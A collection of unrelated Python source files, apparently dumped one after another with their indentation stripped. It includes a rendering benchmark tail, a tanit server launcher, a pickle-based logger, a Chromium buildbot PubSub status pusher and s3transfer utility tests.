8proc, 8gpu: 650x8fps (roughly linear scaling)
2. GTX 1080Ti, nvidia387.34:
1proc: 1367fps
3proc: 1005x3fps
5proc: 680x5fps
3. Quadro GP100:
With EGL backend,nvidia384.81:
1proc, 1gpu: 700fps
3proc, 1gpu: 600x3fps
5proc, 1gpu: 500x5fps
"""
parser = argparse.ArgumentParser()
parser.add_argument('obj')
parser.add_argument('--num-proc', type=int, default=1)
parser.add_argument('--num-gpu', type=int, default=1)
parser.add_argument('--width', type=int, default=120)
parser.add_argument('--height', type=int, default=90)
parser.add_argument('--num-iter', type=int, default=5000)
args = parser.parse_args()
global cfg
cfg = create_default_config('.')
procs = []
for i in range(args.num_proc):
device = i % args.num_gpu
procs.append(mp.Process(target=worker, args=(i, device, args.num_iter)))
for p in procs:
p.start()
for p in procs:
p.join()
|
__main__.py
|
import contextlib
import os
import time
from threading import Thread
from tanit.master.client.factory import ClientType
from tanit.master.client.factory import ThriftClientFactory
from tanit.master.config.config import MasterConfig
from tanit.master.server.server import MasterServer
from tanit.worker.server.server import WorkerServer
from ..resources import conf
config_dir = os.path.dirname(os.path.abspath(conf.__file__))
@contextlib.contextmanager
def master_server():
server = MasterServer(config=config_dir)
server_daemon = Thread(target=server.start, args=())
server_daemon.setDaemon(True)
server_daemon.start()
# wait for the server to start
time.sleep(2.0)
yield
server.stop()
server_daemon.join()
@contextlib.contextmanager
def worker_server():
server = WorkerServer(config=config_dir)
server_daemon = Thread(target=server.start, args=())
server_daemon.setDaemon(True)
server_daemon.start()
# wait for the server to start
time.sleep(2.0)
yield
server.stop()
server_daemon.join()
@contextlib.contextmanager
def worker_client():
config = MasterConfig(path=config_dir)
factory = ThriftClientFactory(
config.worker_service_host, config.worker_service_port
)
client = factory.create_client(ClientType.WORKER_SERVICE)
client.start()
yield client
client.stop()
def main(argv=None):
with master_server():
with worker_server():
with worker_client() as client:
print(len(client.list_workers()))
if __name__ == "__main__":
main()
|
log.py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 6 17:55:45 2017
@author: ahefny
"""
import threading
import time
import cPickle
import os
import os.path
class Logger:
_instance = None
def __init__(self):
self.global_tag = None
self.filter = lambda gtag,tag: True
self.log = []
self._file = None
self._lock = threading.Lock()
self._period = 5
self._active = True
self._save_thread = threading.Thread(target=self._save_loop)
self._save_thread.start()
def append(self, tag, value, print_out=False):
if self.filter(self.global_tag, tag):
# If value is a function, call it.
if callable(value):
value = value()
self._lock.acquire()
self.log.append((self.global_tag, tag, value))
self._lock.release()
if print_out:
print 'LOG[{}::{}]:'.format(self.global_tag, tag)
print value
def set_file(self, f):
assert self._file is None
directory = os.path.dirname(f)
if not os.path.exists(directory):
os.makedirs(directory)
self._file = open(f, 'wb')
#def is_main_thread_alive(self):
# for t in threading.enumerate():
# if t.name == 'MainThread':
# return t.is_alive()
def stop(self):
self._active = False
self._save_thread.join()
self._save()
if self._file is not None:
self._file.close()
def _save(self):
self._lock.acquire()
if self._file is not None:
for x in self.log:
cPickle.dump(x, self._file, protocol=2)
self.log = []
self._file.flush()
self._lock.release()
def _save_loop(self):
while self._active:
time.sleep(self._period)
self._save()
@classmethod
def instance(cls):
if Logger._instance is None:
Logger._instance = Logger()
return Logger._instance
if __name__ == '__main__':
log = Logger.instance()
test_file = '/tmp/psr_lite_log.pkl'
log.set_file(test_file)
log.append('test', 123, print_out=True)
log.period = 1
time.sleep(2)
log.append('test', 456, print_out=True)
log.stop()
f = open(test_file, 'rb')
while True:
try:
print cPickle.load(f)
except EOFError:
break
f.close()
|
pubsub_json_status_push.py
|
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import ConfigParser
import contextlib
import Queue
import base64
import collections
import datetime
import functools
import httplib2
import json
import multiprocessing
import os
import time
import traceback
from apiclient import discovery
from buildbot.status.base import StatusReceiverMultiService
from master import auth
from master.deferred_resource import DeferredResource
from oauth2client import client as oauth2client
from twisted.internet import defer, reactor
from twisted.python import log
PUBSUB_SCOPES = ['https://www.googleapis.com/auth/pubsub']
def parent_is_alive():
"""Check For the existence of a unix pid.
Do a check if the parent process is still alive. If not then
put a None in the queue ourself so that the process terminates
after processing the backlog. (Linux only).
"""
if hasattr(os, 'getppid'):
try:
os.kill(os.getppid(), 0)
except OSError:
return False
else:
return True
# Default to saying the parent is alive, since we don't actually know.
return True
class exponential_retry(object):
"""Decorator which retries the function if an exception is encountered."""
def __init__(self, retries=None, delay=None):
self.retries = retries or 5
self.delay = delay or 1.0
def __call__(self, f):
@functools.wraps(f)
def wrapper(*args, **kwargs):
retry_delay = self.delay
for i in xrange(self.retries):
try:
return f(*args, **kwargs)
except Exception as e:
if (i+1) >= self.retries:
raise
log.err('Exception %s encountered, retrying in %d second(s)\n%s' %
(e, retry_delay, traceback.format_exc()))
time.sleep(retry_delay)
retry_delay *= 2
return wrapper
class PubSubClient(object):
"""A client residing in a separate process to send data to PubSub.
This is separated from the main twistd reactor in order to shield the
main reactor from the increased load.
"""
def __init__(self, topic_url, service_account_file):
self.topic_url = topic_url
self.service_account_file = '/' + os.path.join(
'creds', 'service_accounts', service_account_file)
self.queue = multiprocessing.Queue()
self.runner = multiprocessing.Process(target=self._runner)
try:
self.credentials = auth.create_service_account_credentials(
self.service_account_file, scope=PUBSUB_SCOPES)
except auth.Error as e:
log.err(
'PubSub: Could not load credentials %s: %s.' % (
self.service_account_file, e))
raise e
self.client = self._create_pubsub_client(credentials=self.credentials)
# Check to see if the topic exists. Anything that's not a 200 means it
# doesn't exist or is inaccessable.
@exponential_retry(retries=4, delay=1)
def _run():
# This blocks the twisted reactor but whatever, it's just the initial
# startup sequence.
self.client.projects().topics().get(topic=self.topic_url).execute()
_run()
log.msg('PubSub client for topic %s started' % self.topic_url)
self.runner.start()
def send(self, data):
self.queue.put(data)
def close(self):
self.queue.put(None)
self.runner.join(10)
if self.runner.is_alive():
# Can't possibly take that long to drain outstanding messages,
# just kill it.
self.runner.terminate()
self.runner.join()
@staticmethod
def _send_data(client, topic, data):
# TODO(hinoka): Sign messages so that they can be verified to originate
# from buildbot.
body = { 'messages': [{'data': base64.b64encode(data)}] }
log.msg('PubSub: Sending message to topic %s' % topic)
@exponential_retry(retries=4, delay=1)
def _run():
client.projects().topics().publish(topic=topic, body=body).execute()
_run()
log.msg('PubSub: Sending message to topic %s successful' % topic)
def _runner(self):
while True:
try:
try:
# Block, and timeout if it's exceeded 5 seconds.
data = self.queue.get(True, 5)
except Queue.Empty:
if not parent_is_alive():
log.msg('PubSub: Parent has died, exiting.')
self.queue.put(None)
continue
if data is None:
log.msg('PubSub: Received exit signal, quitting.')
break
try:
self._send_data(self.client, self.topic_url, data)
except Exception as e:
log.err('PubSub: Encountered error while sending data: %s' % e)
except Exception as e:
log.err('PubSub: Encountered error: %s' % e)
@staticmethod
def _create_pubsub_client(credentials=None, http=None):
"""Create a new configured pubsub client.
Copied from https://cloud.google.com/pubsub/configure
"""
http = httplib2.Http()
credentials.authorize(http)
return discovery.build('pubsub', 'v1', http=http)
# Annotation that wraps an event handler.
def event_handler(func):
"""Annotation to simplify 'StatusReceiver' event callback methods.
This annotation uses the wrapped function's name as the event name and
logs the event if the 'StatusPush' is configured to be verbose.
"""
status = func.__name__
@functools.wraps(func)
def wrapper(self, *args, **kwargs):
if self.verbose:
log.msg('Status update (%s): %s %s' % (
status, args, ' '.join(['%s=%s' % (k, kwargs[k])
for k in sorted(kwargs.keys())])))
return func(self, *args, **kwargs)
return wrapper
class ConfigError(ValueError):
pass
class NotEnabled(Exception):
"""Raised when PubSub is purposely not enabled."""
_BuildBase = collections.namedtuple(
'_BuildBase', ('builder_name', 'build_number'))
class _Build(_BuildBase):
# Disable "no __init__ method" warning | pylint: disable=W0232
def __repr__(self):
return '%s/%s' % (self.builder_name, self.build_number)
class StatusPush(StatusReceiverMultiService):
"""
Periodically push builder status updates to pubsub.
"""
DEFAULT_PUSH_INTERVAL_SEC = 30
# Perform verbose logging.
verbose = False
@classmethod
def CreateStatusPush(cls, activeMaster, pushInterval=None):
assert activeMaster, 'An active master must be supplied.'
if not (
activeMaster.is_production_host or os.environ.get('TESTING_MASTER')):
log.msg(
'Not a production host or testing, not loading the PubSub '
'status listener.')
return None
topic_url = getattr(activeMaster, 'pubsub_topic_url', None)
if not topic_url:
log.msg('PubSub: Missing pubsub_topic_url, not enabling.')
return None
# Set the master name, for indexing purposes.
name = getattr(activeMaster, 'name', None)
if not name:
raise ConfigError(
'A master name must be supplied for pubsub push support.')
service_account_file = getattr(
activeMaster, 'pubsub_service_account_file', None)
if not service_account_file:
raise ConfigError('A service account file must be specified.')
return cls(topic_url, service_account_file, name, pushInterval)
def __init__(self, topic_url, service_account_file, name, pushInterval=None):
"""Instantiates a new StatusPush service.
Args:
topic_url: Pubsub URL to push updates to.
service_account_file: Credentials to use to push to pubsub.
pushInterval: (number/timedelta) The data push interval. If a number is
supplied, it is the number of seconds.
"""
StatusReceiverMultiService.__init__(self)
# Parameters.
self.pushInterval = self._getTimeDelta(pushInterval or
self.DEFAULT_PUSH_INTERVAL_SEC)
self.name = name # Master name, since builds don't include this info.
self.topic_url = topic_url
self._client = PubSubClient(self.topic_url, service_account_file)
self._status = None
self._res = None
self._updated_builds = set()
self._pushTimer = None
@staticmethod
def _getTimeDelta(value):
"""Returns: A 'datetime.timedelta' representation of 'value'."""
if isinstance(value, datetime.timedelta):
return value
elif isinstance(value, (int, long)):
return datetime.timedelta(seconds=value)
raise TypeError('Unknown time delta type; must be timedelta or number.')
def startService(self):
"""Twisted service is starting up."""
StatusReceiverMultiService.startService(self)
# Subscribe to get status updates.
self._status = self.parent.getStatus()
self._status.subscribe(self)
# Schedule our first push.
self._schedulePush()
@defer.inlineCallbacks
def stopService(self):
"""Twisted service is shutting down."""
self._clearPushTimer()
# Do one last status push.
yield self._doStatusPush(self._updated_builds)
# Stop our resource.
self._client.close()
@defer.inlineCallbacks
def _doStatusPush(self, updated_builds):
"""Pushes the current state of the builds in 'updated_builds'.
Args:
updated_builds: (collection) A collection of _Build instances to push.
"""
# If there are no updated builds, we're done.
if not updated_builds:
return
# Load all build information for builds that we're pushing.
builds = sorted(updated_builds)
if self.verbose:
log.msg('PusSub: Pushing status for builds: %s' % (builds,))
loaded_builds = yield defer.DeferredList([self._loadBuild(b)
for b in builds])
send_builds = []
for i, build in enumerate(builds):
success, result = loaded_builds[i]
if not success:
log.err('Failed to load build for [%s]: %s' % (build, result))
continue
# result is a (build, build_dict) tuple.
_, send_build = result
send_build['master'] = self.name
send_builds.append(send_build)
# If there are no builds to send, do nothing.
if not send_builds:
return
# Send off the builds.
self._client.send(json.dumps(send_builds))
def _pushTimerExpired(self):
"""Callback invoked when the push timer has expired.
This function takes a snapshot of updated builds and begins a push.
"""
self._clearPushTimer()
# Collect this round of updated builds. We clear our updated builds in case
# more accumulate during the send interval. If the send fails, we will
# re-add them back in the errback.
updates = self._updated_builds.copy()
self._updated_builds.clear()
if self.verbose:
log.msg('PubSub: Status push timer expired. Pushing updates for: %s' % (
sorted(updates)))
# Upload them. Reschedule our send timer after this push completes. If it
# fails, add the builds back to the 'updated_builds' list so we don't lose
# them.
d = self._doStatusPush(updates)
def eb_status_push(failure, updates):
# Re-add these builds to our 'updated_builds' list.
log.err('Failed to do status push for %s: %s' % (
sorted(updates), failure))
self._updated_builds.update(updates)
d.addErrback(eb_status_push, updates)
def cb_schedule_next_push(ignored):
self._schedulePush()
d.addBoth(cb_schedule_next_push)
def _schedulePush(self):
"""Schedules the push timer to perform a push."""
if self._pushTimer:
return
if self.verbose:
log.msg('PubSub: Scheduling push timer in: %s' % (self.pushInterval,))
self._pushTimer = reactor.callLater(self.pushInterval.total_seconds(),
self._pushTimerExpired)
def _clearPushTimer(self):
"""Cancels any current push timer and clears its state."""
if self._pushTimer:
if self._pushTimer.active():
self._pushTimer.cancel()
self._pushTimer = None
def _loadBuild(self, b):
"""Loads the build dictionary associated with a '_Build' object.
Returns: (build, build_data), via Deferred.
build: (_Build) The build object that was loaded.
build_data: (dict) The build data for 'build'.
"""
builder = self._status.getBuilder(b.builder_name)
build = builder.getBuild(b.build_number)
return defer.succeed((b, build.asDict()))
def _recordBuild(self, build):
"""Records an update to a 'buildbot.status.build.Build' object.
Args:
build: (Build) The BuildBot Build object that was updated.
"""
build = _Build(
builder_name=build.builder.name,
build_number=build.number,
)
self._updated_builds.add(build)
#### Events
@event_handler
def builderAdded(self, _builderName, _builder):
return self
@event_handler
def buildStarted(self, _builderName, build):
self._recordBuild(build)
return self
@event_handler
def stepStarted(self, build, _step):
self._recordBuild(build)
return self
@event_handler
def buildFinished(self, _builderName, build, _results):
self._recordBuild(build)
|
test_utils.py
|
# Copyright 2016 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import os.path
import shutil
import tempfile
import threading
import random
import re
import time
import io
from tests import mock, unittest, RecordingSubscriber, NonSeekableWriter
from s3transfer.compat import six
from s3transfer.futures import TransferFuture
from s3transfer.futures import TransferMeta
from s3transfer.utils import get_callbacks
from s3transfer.utils import random_file_extension
from s3transfer.utils import invoke_progress_callbacks
from s3transfer.utils import calculate_num_parts
from s3transfer.utils import calculate_range_parameter
from s3transfer.utils import get_filtered_dict
from s3transfer.utils import CallArgs
from s3transfer.utils import FunctionContainer
from s3transfer.utils import CountCallbackInvoker
from s3transfer.utils import OSUtils
from s3transfer.utils import DeferredOpenFile
from s3transfer.utils import ReadFileChunk
from s3transfer.utils import StreamReaderProgress
from s3transfer.utils import TaskSemaphore
from s3transfer.utils import SlidingWindowSemaphore
from s3transfer.utils import NoResourcesAvailable
from s3transfer.utils import ChunksizeAdjuster
from s3transfer.utils import MIN_UPLOAD_CHUNKSIZE, MAX_SINGLE_UPLOAD_SIZE
from s3transfer.utils import MAX_PARTS
class TestGetCallbacks(unittest.TestCase):
def setUp(self):
self.subscriber = RecordingSubscriber()
self.second_subscriber = RecordingSubscriber()
self.call_args = CallArgs(subscribers=[
self.subscriber, self.second_subscriber]
)
self.transfer_meta = TransferMeta(self.call_args)
self.transfer_future = TransferFuture(self.transfer_meta)
def test_get_callbacks(self):
callbacks = get_callbacks(self.transfer_future, 'queued')
# Make sure two callbacks were added as both subscribers had
# an on_queued method.
self.assertEqual(len(callbacks), 2)
# Ensure that the callback was injected with the future by calling
# one of them and checking that the future was used in the call.
callbacks[0]()
self.assertEqual(
self.subscriber.on_queued_calls,
[{'future': self.transfer_future}]
)
def test_get_callbacks_for_missing_type(self):
callbacks = get_callbacks(self.transfer_future, 'fake_state')
# There should be no callbacks as the subscribers will not have the
# on_fake_state method
self.assertEqual(len(callbacks), 0)
class TestGetFilteredDict(unittest.TestCase):
def test_get_filtered_dict(self):
original = {
'Include': 'IncludeValue',
'NotInlude': 'NotIncludeValue'
}
whitelist = ['Include']
self.assertEqual(
get_filtered_dict(original, whitelist),
{'Include': 'IncludeValue'}
)
class TestCallArgs(unittest.TestCase):
def test_call_args(self):
call_args = CallArgs(foo='bar', biz='baz')
self.assertEqual(call_args.foo, 'bar')
self.assertEqual(call_args.biz, 'baz')
class TestFunctionContainer(unittest.TestCase):
def get_args_kwargs(self, *args, **kwargs):
return args, kwargs
def test_call(self):
func_container = FunctionContainer(
self.get_args_kwargs, 'foo', bar='baz')
self.assertEqual(func_container(), (('foo',), {'bar': 'baz'}))
def test_repr(self):
func_container = FunctionContainer(
self.get_args_kwargs, 'foo', bar='baz')
self.assertEqual(
str(func_container), 'Function: %s with args %s and kwargs %s' % (
self.get_args_kwargs, ('foo',), {'bar': 'baz'}))
class TestCountCallbackInvoker(unittest.TestCase):
def invoke_callback(self):
self.ref_results.append('callback invoked')
def assert_callback_invoked(self):
self.assertEqual(self.ref_results, ['callback invoked'])
def assert_callback_not_invoked(self):
self.assertEqual(self.ref_results, [])
def setUp(self):
self.ref_results = []
self.invoker = CountCallbackInvoker(self.invoke_callback)
def test_increment(self):
self.invoker.increment()
self.assertEqual(self.invoker.current_count, 1)
def test_decrement(self):
self.invoker.increment()
self.invoker.increment()
self.invoker.decrement()
self.assertEqual(self.invoker.current_count, 1)
def test_count_cannot_go_below_zero(self):
with self.assertRaises(RuntimeError):
self.invoker.decrement()
def test_callback_invoked_only_once_finalized(self):
self.invoker.increment()
self.invoker.decrement()
self.assert_callback_not_invoked()
self.invoker.finalize()
# Callback should only be invoked once finalized
self.assert_callback_invoked()
def test_callback_invoked_after_finalizing_and_count_reaching_zero(self):
self.invoker.increment()
self.invoker.finalize()
# Make sure that it does not get invoked immediately after
# finalizing as the count is currently one
self.assert_callback_not_invoked()
self.invoker.decrement()
self.assert_callback_invoked()
def test_cannot_increment_after_finalization(self):
self.invoker.finalize()
with self.assertRaises(RuntimeError):
self.invoker.increment()
class TestRandomFileExtension(unittest.TestCase):
def test_has_proper_length(self):
self.assertEqual(
len(random_file_extension(num_digits=4)), 4)
class TestInvokeProgressCallbacks(unittest.TestCase):
def test_invoke_progress_callbacks(self):
recording_subscriber = RecordingSubscriber()
invoke_progress_callbacks([recording_subscriber.on_progress], 2)
self.assertEqual(recording_subscriber.calculate_bytes_seen(), 2)
def test_invoke_progress_callbacks_with_no_progress(self):
recording_subscriber = RecordingSubscriber()
invoke_progress_callbacks([recording_subscriber.on_progress], 0)
self.assertEqual(len(recording_subscriber.on_progress_calls), 0)
class TestCalculateNumParts(unittest.TestCase):
def test_calculate_num_parts_divisible(self):
self.assertEqual(calculate_num_parts(size=4, part_size=2), 2)
def test_calculate_num_parts_not_divisible(self):
self.assertEqual(calculate_num_parts(size=3, part_size=2), 2)
class TestCalculateRangeParameter(unittest.TestCase):
def setUp(self):
self.part_size = 5
self.part_index = 1
self.num_parts = 3
def test_calculate_range_paramter(self):
range_val = calculate_range_parameter(
self.part_size, self.part_index, self.num_parts)
self.assertEqual(range_val, 'bytes=5-9')
def test_last_part_with_no_total_size(self):
range_val = calculate_range_parameter(
self.part_size, self.part_index, num_parts=2)
self.assertEqual(range_val, 'bytes=5-')
def test_last_part_with_total_size(self):
range_val = calculate_range_parameter(
self.part_size, self.part_index, num_parts=2, total_size=8)
self.assertEqual(range_val, 'bytes=5-7')
class BaseUtilsTest(unittest.TestCase):
def setUp(self):
self.tempdir = tempfile.mkdtemp()
self.filename = os.path.join(self.tempdir, 'foo')
self.content = b'abc'
with open(self.filename, 'wb') as f:
f.write(self.content)
self.amounts_seen = []
self.num_close_callback_calls = 0
def tearDown(self):
shutil.rmtree(self.tempdir)
def callback(self, bytes_transferred):
self.amounts_seen.append(bytes_transferred)
def close_callback(self):
self.num_close_callback_calls += 1
class TestOSUtils(BaseUtilsTest):
def test_get_file_size(self):
self.assertEqual(
OSUtils().get_file_size(self.filename), len(self.content))
def test_open_file_chunk_reader(self):
reader = OSUtils().open_file_chunk_reader(
self.filename, 0, 3, [self.callback])
# The returned reader should be a ReadFileChunk.
self.assertIsInstance(reader, ReadFileChunk)
# The content of the reader should be correct.
self.assertEqual(reader.read(), self.content)
# Callbacks should be disabled depspite being passed in.
self.assertEqual(self.amounts_seen, [])
def test_open_file_chunk_reader_from_fileobj(self):
with open(self.filename, 'rb') as f:
reader = OSUtils().open_file_chunk_reader_from_fileobj(
f, len(self.content), len(self.content), [self.callback])
# The returned reader should be a ReadFileChunk.
self.assertIsInstance(reader, ReadFileChunk)
# The content of the reader should be correct.
self.assertEqual(reader.read(), self.content)
reader.close()
# Callbacks should be disabled depspite being passed in.
self.assertEqual(self.amounts_seen, [])
self.assertEqual(self.num_close_callback_calls, 0)
def test_open_file(self):
fileobj = OSUtils().open(os.path.join(self.tempdir, 'foo'), 'w')
self.assertTrue(hasattr(fileobj, 'write'))
def test_remove_file_ignores_errors(self):
non_existent_file = os.path.join(self.tempdir, 'no-exist')
# This should not exist to start.
self.assertFalse(os.path.exists(non_existent_file))
try:
OSUtils().remove_file(non_existent_file)
except OSError as e:
self.fail('OSError should have been caught: %s' % e)
def test_remove_file_proxies_remove_file(self):
OSUtils().remove_file(self.filename)
self.assertFalse(os.path.exists(self.filename))
def test_rename_file(self):
new_filename = os.path.join(self.tempdir, 'newfoo')
OSUtils().rename_file(self.filename, new_filename)
self.assertFalse(os.path.exists(self.filename))
self.assertTrue(os.path.exists(new_filename))
def test_is_special_file_for_normal_file(self):
self.assertFalse(OSUtils().is_special_file(self.filename))
def test_is_special_file_for_non_existant_file(self):
non_existant_filename = os.path.join(self.tempdir, 'no-exist')
self.assertFalse(os.path.exists(non_existant_filename))
self.assertFalse(OSUtils().is_special_file(non_existant_filename))
def test_get_temp_filename(self):
filename = 'myfile'
self.assertIsNotNone(
re.match(
r'%s\.[0-9A-Fa-f]{8}$' % filename,
OSUtils().get_temp_filename(filename)
)
)
def test_get_temp_filename_len_255(self):
filename = 'a'*255
temp_filename = OSUtils().get_temp_filename(filename)
self.assertLessEqual(len(temp_filename), 255)
def test_get_temp_filename_len_gt_255(self):
filename = 'a'*280
temp_filename = OSUtils().get_temp_filename(filename)
self.assertLessEqual(len(temp_filename), 255)
def test_allocate(self):
truncate_size = 1
OSUtils().allocate(self.filename, truncate_size)
with open(self.filename, 'rb') as f:
self.assertEqual(len(f.read()), truncate_size)
@mock.patch('s3transfer.utils.fallocate')
def test_allocate_with_io_error(self, mock_fallocate):
mock_fallocate.side_effect = IOError()
with self.assertRaises(IOError):
OSUtils().allocate(self.filename, 1)
self.assertFalse(os.path.exists(self.filename))
@mock.patch('s3transfer.utils.fallocate')
def test_allocate_with_os_error(self, mock_fallocate):
mock_fallocate.side_effect = OSError()
with self.assertRaises(OSError):
OSUtils().allocate(self.filename, 1)
self.assertFalse(os.path.exists(self.filename))
class TestDeferredOpenFile(BaseUtilsTest):
def setUp(self):
super(TestDeferredOpenFile, self).setUp()
self.filename = os.path.join(self.tempdir, 'foo')
self.contents = b'my contents'
with open(self.filename, 'wb') as f:
f.write(self.contents)
self.deferred_open_file = DeferredOpenFile(
self.filename, open_function=self.recording_open_function)
self.open_call_args = []
def tearDown(self):
self.deferred_open_file.close()
super(TestDeferredOpenFile, self).tearDown()
def recording_open_function(self, filename, mode):
self.open_call_args.append((filename, mode))
return open(filename, mode)
def open_nonseekable(self, filename, mode):
self.open_call_args.append((filename, mode))
return NonSeekableWriter(six.BytesIO(self.content))
def test_instantiation_does_not_open_file(self):
DeferredOpenFile(
self.filename, open_function=self.recording_open_function)
self.assertEqual(len(self.open_call_args), 0)
def test_name(self):
self.assertEqual(self.deferred_open_file.name, self.filename)
def test_read(self):
content = self.deferred_open_file.read(2)
self.assertEqual(content, self.contents[0:2])
content = self.deferred_open_file.read(2)
self.assertEqual(content, self.contents[2:4])
self.assertEqual(len(self.open_call_args), 1)
def test_write(self):
self.deferred_open_file = DeferredOpenFile(
self.filename, mode='wb',
open_function=self.recording_open_function)
write_content = b'foo'
self.deferred_open_file.write(write_content)
self.deferred_open_file.write(write_content)
self.deferred_open_file.close()
# Both of the writes should now be in the file.
with open(self.filename, 'rb') as f:
self.assertEqual(f.read(), write_content*2)
# Open should have only been called once.
self.assertEqual(len(self.open_call_args), 1)
def test_seek(self):
self.deferred_open_file.seek(2)
content = self.deferred_open_file.read(2)
self.assertEqual(content, self.contents[2:4])
self.assertEqual(len(self.open_call_args), 1)
def test_open_does_not_seek_with_zero_start_byte(self):
self.deferred_open_file = DeferredOpenFile(
self.filename, mode='wb', start_byte=0,
open_function=self.open_nonseekable)
try:
# If this seeks, an UnsupportedOperation error will be raised.
self.deferred_open_file.write(b'data')
except io.UnsupportedOperation:
self.fail('DeferredOpenFile seeked upon opening')
def test_open_seeks_with_nonzero_start_byte(self):
self.deferred_open_file = DeferredOpenFile(
self.filename, mode='wb', start_byte=5,
open_function=self.open_nonseekable)
# Since a non-seekable file is being opened, calling Seek will raise
# an UnsupportedOperation error.
with self.assertRaises(io.UnsupportedOperation):
self.deferred_open_file.write(b'data')
def test_tell(self):
self.deferred_open_file.tell()
# tell() should not have opened the file if it has not been seeked
# or read because we know the start bytes upfront.
self.assertEqual(len(self.open_call_args), 0)
self.deferred_open_file.seek(2)
self.assertEqual(self.deferred_open_file.tell(), 2)
self.assertEqual(len(self.open_call_args), 1)
def test_open_args(self):
self.deferred_open_file = DeferredOpenFile(
self.filename, mode='ab+',
open_function=self.recording_open_function)
# Force an open
self.deferred_open_file.write(b'data')
self.assertEqual(len(self.open_call_args), 1)
self.assertEqual(self.open_call_args[0], (self.filename, 'ab+'))
def test_context_handler(self):
with self.deferred_open_file:
self.assertEqual(len(self.open_call_args), 1)
class TestReadFileChunk(BaseUtilsTest):
def test_read_entire_chunk(self):
filename = os.path.join(self.tempdir, 'foo')
with open(filename, 'wb') as f:
f.write(b'onetwothreefourfivesixseveneightnineten')
chunk = ReadFileChunk.from_filename(
filename, start_byte=0, chunk_size=3)
self.assertEqual(chunk.read(), b'one')
self.assertEqual(chunk.read(), b'')
def test_read_with_amount_size(self):
filename = os.path.join(self.tempdir, 'foo')
with open(filename, 'wb') as f:
f.write(b'onetwothreefourfivesixseveneightnineten')
chunk = ReadFileChunk.from_filename(
filename, start_byte=11, chunk_size=4)
self.assertEqual(chunk.read(1), b'f')
self.assertEqual(chunk.read(1), b'o')
self.assertEqual(chunk.read(1), b'u')
self.assertEqual(chunk.read(1), b'r')
self.assertEqual(chunk.read(1), b'')
def test_reset_stream_emulation(self):
filename = os.path.join(self.tempdir, 'foo')
with open(filename, 'wb') as f:
f.write(b'onetwothreefourfivesixseveneightnineten')
chunk = ReadFileChunk.from_filename(
filename, start_byte=11, chunk_size=4)
self.assertEqual(chunk.read(), b'four')
chunk.seek(0)
self.assertEqual(chunk.read(), b'four')
def test_read_past_end_of_file(self):
filename = os.path.join(self.tempdir, 'foo')
with open(filename, 'wb') as f:
f.write(b'onetwothreefourfivesixseveneightnineten')
chunk = ReadFileChunk.from_filename(
filename, start_byte=36, chunk_size=100000)
self.assertEqual(chunk.read(), b'ten')
self.assertEqual(chunk.read(), b'')
self.assertEqual(len(chunk), 3)
def test_tell_and_seek(self):
filename = os.path.join(self.tempdir, 'foo')
with open(filename, 'wb') as f:
f.write(b'onetwothreefourfivesixseveneightnineten')
chunk = ReadFileChunk.from_filename(
filename, start_byte=36, chunk_size=100000)
self.assertEqual(chunk.tell(), 0)
self.assertEqual(chunk.read(), b'ten')
self.assertEqual(chunk.tell(), 3)
chunk.seek(0)
self.assertEqual(chunk.tell(), 0)
chunk.seek(1, whence=1)
self.assertEqual(chunk.tell(), 1)
chunk.seek(-1, whence=1)
self.assertEqual(chunk.tell(), 0)
chunk.seek(-1, whence=2)
self.assertEqual(chunk.tell(), 2)
def test_tell_and_seek_boundaries(self):
# Test to ensure ReadFileChunk behaves the same as the
# Python standard library around seeking and reading out
# of bounds in a file object.
data = b'abcdefghij12345678klmnopqrst'
start_pos = 10
chunk_size = 8
# Create test file
filename = os.path.join(self.tempdir, 'foo')
with open(filename, 'wb') as f:
f.write(data)
# ReadFileChunk should be a substring of only numbers
file_objects = [
ReadFileChunk.from_filename(
filename, start_byte=start_pos, chunk_size=chunk_size
)]
# Uncomment next line to validate we match Python's io.BytesIO
# file_objects.append(io.BytesIO(data[start_pos:start_pos+chunk_size]))
for obj in file_objects:
self._assert_whence_start_behavior(obj)
self._assert_whence_end_behavior(obj)
self._assert_whence_relative_behavior(obj)
self._assert_boundary_behavior(obj)
def _assert_whence_start_behavior(self, file_obj):
self.assertEqual(file_obj.tell(), 0)
file_obj.seek(1, 0)
self.assertEqual(file_obj.tell(), 1)
file_obj.seek(1)
self.assertEqual(file_obj.tell(), 1)
self.assertEqual(file_obj.read(), b'2345678')
file_obj.seek(3, 0)
self.assertEqual(file_obj.tell(), 3)
file_obj.seek(0, 0)
self.assertEqual(file_obj.tell(), 0)
def _assert_whence_relative_behavior(self, file_obj):
self.assertEqual(file_obj.tell(), 0)
file_obj.seek(2, 1)
self.assertEqual(file_obj.tell(), 2)
file_obj.seek(1, 1)
self.assertEqual(file_obj.tell(), 3)
self.assertEqual(file_obj.read(), b'45678')
file_obj.seek(20, 1)
self.assertEqual(file_obj.tell(), 28)
file_obj.seek(-30, 1)
self.assertEqual(file_obj.tell(), 0)
self.assertEqual(file_obj.read(), b'12345678')
file_obj.seek(-8, 1)
self.assertEqual(file_obj.tell(), 0)
def _assert_whence_end_behavior(self, file_obj):
self.assertEqual(file_obj.tell(), 0)
file_obj.seek(-1, 2)
self.assertEqual(file_obj.tell(), 7)
file_obj.seek(1, 2)
self.assertEqual(file_obj.tell(), 9)
file_obj.seek(3, 2)
self.assertEqual(file_obj.tell(), 11)
self.assertEqual(file_obj.read(), b'')
file_obj.seek(-15, 2)
self.assertEqual(file_obj.tell(), 0)
self.assertEqual(file_obj.read(), b'12345678')
file_obj.seek(-8, 2)
self.assertEqual(file_obj.tell(), 0)
def _assert_boundary_behavior(self, file_obj):
# Verify we're at the start
self.assertEqual(file_obj.tell(), 0)
# Verify we can't move backwards beyond start of file
file_obj.seek(-10, 1)
self.assertEqual(file_obj.tell(), 0)
# Verify we *can* move after end of file, but return nothing
file_obj.seek(10, 2)
self.assertEqual(file_obj.tell(), 18)
self.assertEqual(file_obj.read(), b'')
self.assertEqual(file_obj.read(10), b'')
# Verify we can partially rewind
file_obj.seek(-12, 1)
self.assertEqual(file_obj.tell(), 6)
self.assertEqual(file_obj.read(), b'78')
self.assertEqual(file_obj.tell(), 8)
